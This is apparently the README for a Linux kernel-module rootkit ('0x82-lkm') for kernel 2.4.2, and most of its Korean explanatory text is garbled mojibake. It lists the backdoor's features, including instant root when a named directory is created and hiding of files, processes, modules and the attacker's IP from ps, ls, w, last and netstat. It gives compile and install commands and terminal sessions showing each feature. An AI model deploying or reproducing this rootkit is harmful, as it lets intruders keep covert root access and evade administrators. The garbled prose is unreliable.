Linux LKM (Loadable Kernel Module) Backdoor for linux kernel v2.4.2


 Á¦ ÇüÆí¾ø´Â ¿µ¾î½Ç·ÂÀ» »Ì³»±â º¸´Ù´Â ½±°Ô Çѱ۷Π¼³¸íÇÏ´Â ÆíÀÌ
 ´õ ºü¸¦ °Í °°½À´Ï´Ù. :-)

 ¿ì¼± Á¦ LKM(Loadable Kernel Module)À» »ç¿ëÇØÁּż­ °¨»ç(?)ÇÕ´Ï´Ù.

 ÀÌ toolÀº º¸´Ù ¾ÈÀüÇÏ°í ¿Ïº®ÇÑ HackingÀ» À§ÇØ Á¦ÀÛµÈ °ÍÀ̶ó ÇÒ ¼ö ÀÖ½À´Ï´Ù.
 ÇöÀç´Â ÃÖ¼ÒÇÑÀÇ ±â´É¸¸À» Áö´Ï°í ÀÖÀ¸¸ç, ¹öÀüÀº v0.2 ÀÔ´Ï´Ù.

 °£´ÜÇÑ ±â´ÉÀ» ¾Ë¾Æº» µÚ ±× »ç¿ë¹ý¿¡ ´ëÇØ ¼³¸íÀ» µå¸®µµ·Ï ÇÏ°Ú½À´Ï´Ù.
 ±¸ÇöµÈ ±â´ÉÀº ´ÙÀ½°ú °°½À´Ï´Ù.


 =-=-=- Functions -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


 0x01. SetUID zer0 Backd00r (make directory).
    -. ƯÁ¤ µð·ºÅ丮 »ý¼º¿¡ µû¸¥ ±ÇÇÑ »ó½Â (uid=0)

 0x02. Directory hidden (directory not move).
    -. µð·ºÅ丮 Åë° ¼û±â±â ±â´É (¼û±èµð·º À̵¿ ºÒ°¡)

 0x03. File hidden (file not read).
    -. ÆÄÀÏ ¼û±â±â ±â´É (ƯÁ¤ÆÄÀÏ Àб⠺Ұ¡)

 0x04. ls command spoof (file & dir not view).
    -. ls ¸í·É ¼ÓÀ̱⠱â´É (ƯÁ¤ÆÄÀÏ & µð·ºÅ丮¸¦ ¼û±è)

 0x05. ps command spoof (process not found).
    -. ps ¸í·É ¼ÓÀ̱⠱â´É (ƯÁ¤ ÇÁ·Î¼¼½º¸¦ ¼û±è)

 0x06. w, netstat, finger, last, lastlog commands spoof (ip not found).
    -. w, netstat, finget, last, lastlog ¸í·Éµî ¼ÓÀ̱⠱â´É (ip¸¦ ¼û±è)

 0x07. hidden LKM Backdoor.
    -. ¿Ã¶ó°£ ƯÁ¤¸ðµâ ¼û±â±â ±â´É (ƯÁ¤¸ðµâ Àб⠺Ұ¡)


 À§ ±â´ÉµéÀº code ÁÖ¼®À¸·Î Ç¥±âÇØ µÎ¾ú½À´Ï´Ù.
 ±×·³ À̹ø¿£ »ç¿ë¹ý¿¡ ´ëÇØ ¼³¸íÇÏ°Ú½À´Ï´Ù.


 =-=-=- Usages -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


 Compile: bash-2.04# gcc -c 0x82-lkm.c
 Install: bash-2.04# insmod 0x82-lkm.o

 ±¸ÇöµÈ ¼Ó¼º(attribute):

 file - ÆÄÀÏ
 dir  - µð·ºÅ丮
 proc - ÇÁ·Î¼¼½º
 ip   - °ø°ÝÀÚ IP
 mod  - °ø°ÝÀÚ ¸ðµâ

 cd ¸í·ÉÀ» ÅëÇØ ÀÌ·ç¾îÁö´Â LKM ¸®¸ðÄܱâ´É: bash-2.04# cd ½Äº°Å°-¼Ó¼º-¼û±æÀ̸§
                           (Âü°í·Î, ½Äº°Å°´Â Default·Î Compile½Ã x82 ÀÔ´Ï´Ù.)

 - ƯÁ¤ µð·ºÅ丮 »ý¼º¿¡ µû¸¥ ±ÇÇÑ »ó½ÂÇϱâ (uid=0) -


 bash-2.04$ id
 uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$ mkdir x82-dir
 bash-2.04$ id
 uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$    

 Default·Î ¼³Á¤°ªÀº "x82-dir"·Î ÀâÇôÀÖÀ¸¸ç, µð·ºÅ丮¸íÀº ¹Ýµå½Ã ÇöÀç ¼û±è
 µð·ºÅ丮·Î ÁöÁ¤µÇ¾î ÀÖ´Â À̸§À» »ç¿ëÇØ¾ß ÇÕ´Ï´Ù.


 - ¼û±è µð·ºÅ丮¸í º¯°æÇϱâ -


 bash-2.04$ cd x82-dir-direct
 bash: cd: x82: No such file or directory
 bash-2.04$ id
 uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$ mkdir direct
 bash-2.04$ id
 uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$            

 À§¸¦ ÀÚ¼¼È÷ º¸¸é ¾Æ½Ã°ÚÁö¸¸, cd ¸í·É°ú ÇÔ²² Àμö·Î "x82-dir-direct"·Î
 ³ÖÀº °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. Àμö´Â ´ÙÀ½°ú °°ÀÌ Çؼ®µË´Ï´Ù.

 x82-dir-direct: x82 (½Äº°Å°) - dir (¼Ó¼º) - direct (¼û±æ À̸§)


 - ÆÄÀÏ ¼û±â±â ±â´É (ƯÁ¤ÆÄÀÏ Àб⠺Ұ¡) -


 À§ÀÇ µð·ºÅ丮 ¼û±â±â¿Í °°ÀÌ ½Äº°Å°¿Í ¼Ó¼º, ¼û±æ À̸§À» ¼ø¼­´ë·Î ³ÖÀ¸¸é
 ÆÄÀÏ°ú µð·ºÅ丮¸¦ ¼û±æ ¼ö ÀÖ½À´Ï´Ù.

 bash-2.04$ touch testfile
 bash-2.04$ ls -al testfile
 -rw-rw-r--    1 x82      x82             0 Apr 14 23:54 testfile
 bash-2.04$ cd x82-file-testfile
 bash: cd: x82: No such file or directory
 bash-2.04$ ls -al testfile
 bash-2.04$ cat testfile
 cat: testfile: No such file or directory
 bash-2.04$


 - ÇÁ·Î¼¼½º ¼û±â±â ±â´É -


 ½Äº°Å°¿Í ¼Ó¼º, ¼û±æ À̸§À» Á¶°Ç¿¡ ¸ÂÃß¾î ÀÔ·ÂÇÏ¸é ´ÙÀ½°ú °°ÀÌ ÇÁ·Î¼¼½º¸¦
 ¼û±æ¼ö ÀÖ½À´Ï´Ù.

 bash-2.04$ ps
   PID TTY          TIME CMD
  8364 pts/1    00:00:00 login
  8442 pts/1    00:00:00 ps
 bash-2.04$ cd x82-proc-login
 bash: cd: x82: No such file or directory
 bash-2.04$ ps
   PID TTY          TIME CMD
  8443 pts/1    00:00:00 ps
 bash-2.04$   


 - °ø°ÝÀÚ IP ¼û±â±â ±â´É -


 ½Äº°Å°¿Í ¼Ó¼º, ¼û±æ IP¸¦ ÀÔ·ÂÇÏ¸é ´ÙÀ½°ú °°ÀÌ IP¸¦ ¼û±æ ¼ö ÀÖ½À´Ï´Ù.

 (¿¹) °ø°ÝÀÚÀÇ IP: 61.27.144.81

 bash-2.04$ cd x82-ip-61.27.144.81
 bash: cd: x82: No such file or directory
 bash-2.04$ w
 12:11am  up 6 days,  6:46,  1 user,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
 x82      pts/1    ............     11:45pm  0.00s  0.09s  0.01s  w
 bash-2.04$ lastlog
 x82              pts/1    ............     XXX XXX 14 23:45:29 +0900 2002
 bash-2.04$ last
 x82      pts/1        ............     XXX XXX 14 23:45   still logged in
 x82      pts/1        ............     XXX XXX 14 23:43 - 23:45  (00:02)
 x82      pts/1        ............     XXX XXX 14 23:11 - 23:15  (00:03)
 
 wtmp begins XXX XXX 14 23:11:29 2002
 bash-2.04$

 À§¿Í °°ÀÌ °ø°ÝÀÚÀÇ IP°¡ ÀüºÎ '.'(dot)À¸·Î Ç¥½ÃµÇ¾î ¹ö¸³´Ï´Ù.

 
 - LKM ƯÁ¤ ¸ðµâ ¼û±â±â -


 ±âº»ÀûÀ¸·Î 0x82-lkm ¸ðµâÀ» ¼û±âµµ·Ï äÅõǾî ÀÖ½À´Ï´Ù.
 ÀÌ´Â ¿©·¯ºÐµé²²¼­ ½±°Ô º¯°æÇϽǼö ÀÖ½À´Ï´Ù.

 bash-2.04# /sbin/lsmod | grep 0x82-lkm
 bash-2.04# /sbin/lsmod
 Module                  Size  Used by
 8139too                16512   1  (autoclean)
 usb-uhci               20752   0  (unused)
 usbcore                49728   1  [usb-uhci]
 bash-2.04# cd x82-mod-usbcore
 bash: cd: x82: No such file or directory
 bash-2.04# /sbin/lsmod | grep usbcore
 bash-2.04#     

 À̷νá, °ø°ÝÀÚ°¡ ½É¾îµÐ LKM±îÁö ¿Ïº®È÷ ¼û±æ ¼ö ÀÖ½À´Ï´Ù.


 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 Linux 7.1 Kernel 2.4.2 ´ë¿¡¼­ test Çغ» °á°ú¿´½À´Ï´Ù.
 ¹öÀü¸¶´Ù test Çغ¸Áö ¸øÇ߱⠶§¹®¿¡ ¹®Á¦Á¡ÀÌ ¹ß»ýÇÒ ¼ö ÀÖ½À´Ï´Ù.
 KernelÀÌ down µÇÁö ¾Êµµ·Ï Àß µ¹º¸¾ÆÁֽñ⠹ٶø´Ï´Ù. :-)

 
 Author: Xpl017Elz in INetCop(c).
 E-mail: szoahc@hotmail.com & xploit@hackermail.com
 Home: http://x82.i21c.net